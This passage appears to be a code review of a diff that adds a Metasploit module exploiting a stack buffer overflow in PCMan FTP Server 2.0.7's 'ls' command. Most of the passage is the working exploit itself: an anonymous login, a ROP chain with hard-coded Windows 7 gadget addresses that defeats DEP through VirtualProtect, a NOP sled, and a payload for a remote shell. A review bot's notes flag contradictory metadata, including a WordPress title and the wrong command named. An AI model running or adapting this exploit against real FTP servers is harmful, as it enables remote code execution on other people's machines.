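requirement, or the VirtualProtect call itself, belongs in main(). `main()` with implicit int and the two header-less `#include` lines also look truncated in this listing.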
@@ -0,0 +1,140 @@
+=begin
+# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
+# Date: 22-06-2016
+# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
+# Exploit Author: quanyechavshuo
+# Contact: quanyechavshuo@gmail.com
+# Website: http://xinghuacai.github.io
+# Category: ftp remote exploit
+
+1. Description
+this is another bug of pcmanftp which can be used to get a remote shell,and fits well with win7x64 with dep open,refer from
+ https://www.exploit-db.com/exploits/39662/
+
+use anonymous and any password to login the ftp remotely,then send a command "ls AAA...A"(9000),the pcmanftp will crashed,later,find the 2009-2012th "A" will replace the pcmanftp's retn address
+
+=end
+
+##
+ # This module requires Metasploit: http://metasploit.com/download
+ # Current source: https://github.com/rapid7/metasploit-framework
+ ##
+
+ require 'msf/core'
+
+ class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Ftp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PCMAN FTP Server Buffer Overflow - ls Command',
+ 'Description' => %q{
+ This module exploits a buffer overflow vulnerability found in the PUT command of the
+ PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+ credientials are enabled.
+ },
+ 'Author' =>
+ [
+ 'quanyechavshuo'
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'EDB', '39662'],
+ [ 'OSVDB', 'N/A']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1000,
+ 'BadChars' => "\x00\x0A\x0D",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'windows 7 x64 chinese',
+ {
+ #'Ret' => 0x77636aeb, #dont need ret here in win7
+ 'Offset' => 2008
+ }
+ ],
+ ],
+ 'DisclosureDate' => 'Aug 07 2015',
+ 'DefaultTarget' => 0))
+ end
+
+ def check
+ connect_login
+ disconnect
+
+ if /220 PCMan's FTP Server 2\.0/ === banner
+ Exploit::CheckCode::Appears
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def create_rop_chain()
+ # rop chain generated with mona.py - www.corelan.be
+ rop_gadgets =
+ [
+ 0x77032c3b, # POP EAX # RETN [kernel32.dll]
+ 0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets
+ 0x73c112d0, # ptr to &VirtualProtect() [IAT OLEACC.dll]
+ 0x76bb4412, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSCTF.dll]
+ 0x76408d2a, # XCHG EAX,ESI # RETN [SHLWAPI.dll]
+ 0x76b607f0, # POP EBP # RETN [msvcrt.dll]
+ 0x74916f14, # & push esp # ret [RICHED20.dll]
+ 0x7368b031, # POP EAX # RETN [COMCTL32.dll]
+ 0xfffffaff, # Value to negate, will become 0x00000201
+ 0x756c9a5c, # NEG EAX # RETN [SHELL32.dll]
+ 0x767088bd, # XCHG EAX,EBX # RETN [RPCRT4.dll]
+ 0x77031d7b, # POP EAX # RETN [kernel32.dll]
+ 0xffffffc0, # Value to negate, will become 0x00000040
+ 0x76cc4402, # NEG EAX # RETN [SHELL32.dll]
+ 0x76b4ad98, # XCHG EAX,EDX # RETN [SHELL32.dll]
+ 0x756b1cc1, # POP ECX # RETN [SHELL32.dll]
+ 0x7647c663, # &Writable location [USP10.dll]
+ 0x73756cf3, # POP EDI # RETN [COMCTL32.dll]
+ 0x76cc4404, # RETN (ROP NOP) [USER32.dll]
+ 0x76b3f5d4, # POP EAX # RETN [msvcrt.dll]
+ 0x90909090, # nop
+ 0x7366e16f, # PUSHAD # RETN [COMCTL32.dll]
+
+ ].flatten.pack("V*")
+
+ return rop_gadgets
+
+ end
+
+
+ def exploit
+ connect_login
+
+ print_status('Generating payload...')
+ sploit = rand_text_alpha(target['Offset'])
+
+ #tmp = sploit
+ #print_status(tmp)
+ sploit << create_rop_chain()
+ #sploit << make_nops(9) 这句产生的nop并非90
+ sploit << "\x90"*30
+ #sploit << "\x41"*30
+ #sploit << "\xcc"
+ sploit << payload.encoded
+
+ #tmp=sploit
+ tmp=make_nops(9)
+ print_status(tmp)
+
+ send_cmd( ["ls", sploit], false )
+ disconnect
+ end
+
+ end
+
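Review bot: The module's own metadata contradicts its code: the `=begin` header says 'WordPress Shopping Cart 3.0.4 Unrestricted File Upload', the description says the PUT command, and References carry a placeholder `[ 'OSVDB', 'N/A']`, while exploit() sends `send_cmd( ["ls", sploit], false )` to PCMan FTP; change the title line to the FTP bug, the description to `found in the ls command of the`, and drop the placeholder reference. The debug leftovers `tmp=make_nops(9)` and `print_status(tmp)` write nine raw bytes of generated NOP-equivalent code to the console on every run and should go, with the Chinese comment on the commented-out `make_nops(9)` line translated (`# make_nops does not emit 0x90 bytes, so a literal sled is used below`) since that is the reason for the hard-coded `"\x90"*30`. create_rop_chain() hard-codes absolute gadget addresses in kernel32, SHELL32, USER32 and other system DLLs for a single 'windows 7 x64 chinese' target, which presumably only hold for that exact DLL set and load layout; the target entry should record the build/service pack and that limitation. `class Metasploit3` is the pre-4.12 naming; the sibling 40004.rb added in this commit already uses `class MetasploitModule`.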